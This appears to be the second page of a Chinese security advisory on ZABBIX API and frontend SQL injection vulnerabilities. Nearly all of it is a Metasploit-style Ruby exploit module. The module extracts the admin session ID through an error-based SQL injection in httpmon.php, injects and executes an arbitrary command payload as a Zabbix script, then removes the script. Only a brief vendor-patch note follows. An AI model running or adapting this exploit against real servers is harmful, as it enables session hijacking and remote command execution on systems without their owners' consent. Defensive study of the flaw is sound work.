ZABBIX API及Frontend多个SQL注入漏洞(CVE(2)

if version and version <= "2.0.8"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

def get_session_id
    # Generate random string and convert to hex
    sqlq = rand_text_alpha(8)
    sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
    sqli = "2 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST"
    sqli << "(sessionid AS CHAR),0x20)),1,50) FROM zabbix.sessions WHERE status=0 and userid=1 "
    sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

# Extract session id from database
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "httpmon.php"),
      'vars_get' => {
        "applications" => sqli
      }
    })

if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/
      session = $1
      print_status("#{peer} - Extracted session cookie - [ #{session} ]")
      return session
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session")
    end
  end

def exploit
    # Retrieve valid session id
    @session = get_session_id
    @sid = "#{@session[16..-1]}"
    script_name = rand_text_alpha(8)
    # Upload script
    print_status("#{peer} - Attempting to inject payload")
    res = send_request_cgi({
      'method' => 'POST',
      'cookie' => "zbx_sessionid=#{@session}",
      'uri'    => normalize_uri(uri, "scripts.php"),
      'vars_post' => {
        'sid' => @sid,
        'form' => 'Create+script',
        'name' => script_name,
        'type' => '0',
        'execute_on' => '1',
        'command' => payload.encoded,
        'commandipmi' => '',
        'description' => '',
        'usrgrpid' => '0',
        'groupid' => '0',
        'access' => '2',
        'save' => 'Save'
      }
    })

if res and res.code == 200 and res.body =~ /(Script added)/
      print_status("#{peer} - Payload injected successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Payload injection failed!")
    end

# Extract 'scriptid' value
    @scriptid = /(?<=scriptid=)(\d+)(?=&sid=#{@sid}">#{script_name})/.match(res.body)

# Trigger Payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "scripts_exec.php"),
      'cookie' => "zbx_sessionid=#{@session}",
      'vars_get' => {
        "execute" =>1,
        "scriptid" => @scriptid,
        "sid" => @sid,
        "hostid" => "10084"
      }
    })
  end

def cleanup
    post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)"
    print_status("#{peer} - Cleaning script remnants")
    res = send_request_cgi({
    'method' => 'POST',
      'data'  => post_data,
      'cookie' => "zbx_sessionid=#{@session}",
      'uri'    => normalize_uri(uri, "scripts.php")
    })

if res and res.code == 200 and res.body =~ /(Script deleted)/
      print_status("#{peer} - Script removed successfully")
    else
      print_warning("#{peer} - Unable to remove script #{@scriptid}")
    end
  end
end

建议:
--------------------------------------------------------------------------------
厂商补丁:

ZABBIX
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/8ce75c412b4b186d5fd94e4533794ffb.html